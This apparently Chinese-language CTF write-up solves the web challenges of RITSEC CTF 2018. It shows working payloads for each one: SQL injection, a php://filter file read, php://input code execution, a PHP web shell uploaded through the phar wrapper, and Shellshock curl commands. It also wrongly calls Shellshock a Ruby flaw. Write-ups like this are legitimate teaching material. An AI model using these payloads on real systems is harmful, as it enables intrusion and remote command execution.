RITSEC CTF 2018 Web-WriteUp

自闭玩家上线。。

Space Force-100

The Space Force has created a portal for the public to learn about and be in awe of our most elite Space Force Fighters. Check it out at fun.ritsec.club:8005!

Author: neon_spandex

首页是一个提供查询功能输入框和一些数据

尝试查找数据The Javelin

尝试输入*查询无果，在尝试注入发现报错

发送payload直接出flag（莫名其妙 :( ）。。SS Roosevelt’or 1=1#

1	RITSEC{hey_there_h4v3_s0me_point$_3ny2Lx}

The Tangled Web-200

fun.ritsec.club:8007

Author: jok3r

访问网站主页发现有很多相关连的链接，

wget一下把文件全部下载下来（wget大法好，后续补上python爬虫脚本）

1	wget -r -l 0 http://fun.ritsec.club:8007/

发现其中有名为Fl4gggg1337的html文件

cat一下发现其中并没有flag，但指向另一个名为Stars的html文件

继续访问发现回显一串可疑字符

1
2
3

root@ubuntu:/ctf/fun.ritsec.club:8007# echo "UklUU0VDe0FSM19ZMFVfRjMzNzFOR18xVF9OMFdfTVJfS1I0QjU/IX0="
|base64 -d
RITSEC{AR3_Y0U_F3371NG_1T_N0W_MR_KR4B5?!}

Crazy Train-250

fun.ritsec.club:3000

Author: hulto

进去首页是这样的

点击

源码发现这样一串东西

google发现是ruby写的，，龟龟

发现有个create a post，并没有可疑的东西

源码发现隐藏着一个输入框

通过修改属性，发现可以在这个输入框进行解析

最后发现此输入框可以直接命令执行，，，

直接cat flag

1	RITSEC{W0wzers_who_new_3x3cuting_c0de_to_debug_was_@_bad_idea}

Archivr-300

Please note that this challenge is currently down. We are working on the issue and will update when it is back up.

fun.ritsec.club:8004

Author: jwood

上传文件题，发现有如下限制

上传大小5kb
上传文件几分钟后自动销毁
无法上传php混写文件(大小写，混合大小写，php5均无效)，但可以上传pht，phtml，php，zip等
没有扩展或者带有php扩展的自动转换为.dat扩展名
上传后文件名自动更改为  （数字+.txt） 的格式，并可以通过此uri进行访问
未检查content-type，可上传php代码的png文件（并没有用）等等

在download页面url可以看到

http://fun.ritsec.club:8004/index.php?page=download

这里通过

http://fun.ritsec.club:8004/index.php?page=php://filter/convert.base64-encode/resource=download

读取到upload源码

<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST')
	{
	if ($_FILES['upload']['size'] > 5000)
		{ //max 5KB
		die("File too large!");
		}
	$filename = $_FILES['upload']['name'];
	$upload_time = time();
	$upload_dir = "uploads/" . md5($_SERVER['REMOTE_ADDR']) . "/";
	$ext = "";
	if (strpos($filename, '.') !== false)
		{
		$f_ext = explode(".", $filename) [1];
		if (ctype_alnum($f_ext) && stripos($f_ext, "php") === false && stripos($f_ext, "pht") === false)
			{
			$ext = "." . $f_ext;
			}
		  else
			{
			$ext = ".dat";
			}
		}
	  else
		{
		$ext = ".dat";
		}
	$upload_path = $upload_dir . md5($upload_time) . $ext;
	mkdir($upload_dir, 0770, true);
	// Enforce maximum of 10 files
	$dir = new DirLister($upload_dir);
	if ($dir->getCount() >= 10)
		{
		unlink($upload_dir . $dir->getOldestFile());
		}
	move_uploaded_file($_FILES['upload']['tmp_name'], $upload_path);
	$key = $upload_time . $ext;
	}
?>

<html>
    <head>
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
        <style>
            body {
                padding-top: 70px;
            }


```
        .fineprint {
            font-size: 2px;
            color: red;
        }
    </style>
</head>
<body>
    <nav class="navbar navbar-inverse navbar-fixed-top">
        <div class="container">
            <div class="navbar-header">
                <a class="navbar-brand" href="/">Archivr</a>
            </div>
            <div id="navbar" class="collapse navbar-collapse">
                <ul class="nav navbar-nav">
                    <li><a href="index.php?page=home">Home</a></li>
                    <li class="active"><a href="index.php?page=upload">Upload</a></li>
                    <li><a href="index.php?page=download">Download</a></li>
                </ul>
            </div>
        </div>
    </nav>
    <div class="container">
```

<?php
if (isset($key))
	{
?>
            <div class="alert alert-success" role="alert">
                File uploaded! Retrieval key: <strong><?php
	echo $key; ?></strong>
            </div>
<?php
	}
?>
            <h3>File Upload</h3>
            <form action="index.php?page=upload" method="post" enctype="multipart/form-data">
                <div class="col-xs-4">
                    <div class="form-group">
                        <label for="upload">Select a &lt;5KB file</label>
                        <input type="file" class="form-control-file" id="upload" name="upload">
                    </div>
                    <div class="form-group">
                        <button type="submit" class="btn btn-primary">Upload</button>
                    </div>
                </div>
            </form>
        </div>
    </body>
</html>

可以看到上传目录为

uploads/md5(REMOTE_ADDR)/md5(time()).ext

通过time（）函数（unix时间戳）计算出文件名

且是通过判断目录底下的文件数量超过10就unlink。（并非时间）

继续看download.php的源码

<?php
if ($_SERVER['REQUEST_METHOD'] == "POST") {
    $key = $_POST['key'];
if (strpos($key, '.') !== false) {
    $key_parts = explode(".", $key);
    $hashed_key = md5(intval($key_parts[0])) . "." . $key_parts[1];

    $path = "uploads/" . md5($_SERVER['REMOTE_ADDR']) . "/" . $hashed_key;
    if (file_exists($path)) {
        header("Content-Disposition: attachment; filename=\"" . $key . "\"");
        die(file_get_contents($path));
    } else {
        $error = "File not found!";
    }
} else {
    $error = "Invalid key!";
}
}
?>

可以看到下载的路径名为访问ip及路径md5

$key_parts = explode(".", $key);
$hashed_key = md5(intval($key_parts[0])) . "." . $key_parts[1];
//$key为upload的返回上传路径
$upload_dir = "uploads/" . md5($_SERVER['REMOTE_ADDR']) . "/";

home.php

<?php
include("classes.php.inc");
include((isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : "home") . ".php");
?>

尝试访问上传目录/uploads/md5(MY_PUBLIC_IP)/

但发现总是404，然后出了hint

https://en.wikipedia.org/wiki/Reverse_proxy

发现无果，，然后膜了师傅们的思路

PS：因为题目环境都是一样的，在What a cute dog那题的curl可以发现remote ip为10.0.10.254

1	root@ubuntu:~# curl -d "<?=phpinfo();?>" -X POST http://fun.ritsec.club:8007/devsrule.php?magic=php://input \| grep "REMOTE"

通过访问此路径发现返回403forbidden，此路不通，但目录是存在的！

然后发现题目是archivr，感觉就是phar协议绕过

参考链接

php：phar协议

通过上传shell.zip返回的$key，快速计算出访问路径，在文件还存在的时候（路径存在）通过phar进行getshell

计算脚本

<?php
$key = "xxxxxxxxxx.zip";
$key_parts = explode(".", $key);
$hashed_key = md5(intval($key_parts[0])) . "." . $key_parts[1];
$path = "uploads/" . md5("10.0.10.254") . "/" . $hashed_key;
echo $path;
?>

上传的shell，压缩为zip上传

1	<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>

读取到flag

1	RITSEC{uns3r1al1z3_4LL_th3_th1ng5}

What a cute dog!-350

This dog is shockingly cute!

fun.ritsec.club:8008

Author: sandw1ch

查看源码发现有这样/cgi-bin/stats的一个东西

发现是一个ruby的cve，编号2014-6271，

参考链接

shellshock

vaas-cve-2014-6271

直接拿payload怼

1
2
3

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -name flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /opt/flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats

出flag

1	RITSEC{sh3ll_sh0cked_w0wz3rs}

Lazy Dev-400

fun.ritsec.club:8007

Author: jok3r

hint（继The Tangled Web）:

1
2
3

> <!-- REMOVE THIS NOTE LATER -->
> <!-- Getting remote access is so much work. Just do fancy things on devsrule.php -->
>

根据hint提示到devsrule.php，返回

1 2	Not what you input eh? This param is 'magic' man.

尝试发送magic=1，flag，true等均无果，最后在php://input绕过进行命令执行，回显目录

A.html
AH.html
AHA.html
AHAAHAH.html
AHH.html
AHHHA.html
AHHHHH.html
Ah.html
Ahhh.html
Away.html
Be.html
Believe.html
Call.html
Can.html
Eyes.html
Feel.html
Fireflies.html
Fl4gggg1337.html
Freedom.html
From.html
Gang.html
Get.html
Give.html
Gonna.html
Gucci.html
Ha.html
I.html
If.html
Is.html
Its.html
JokersSomeSortaHack
Just.html
Like.html
Lot.html
Love.html
Me.html
Million.html
More.html
Never.html
Not.html
Older.html
Once.html
Roll.html
Somebody.html
Stars.html
Stronger.html
Take.html
Tell.html
Ten.html
The.html
Theyll.html
To.html
Told.html
Tonight.html
Up.html
Waving.html
When.html
Will.html
World.html
Would.html
You.html
Your.html
devsrule.php
images
index.html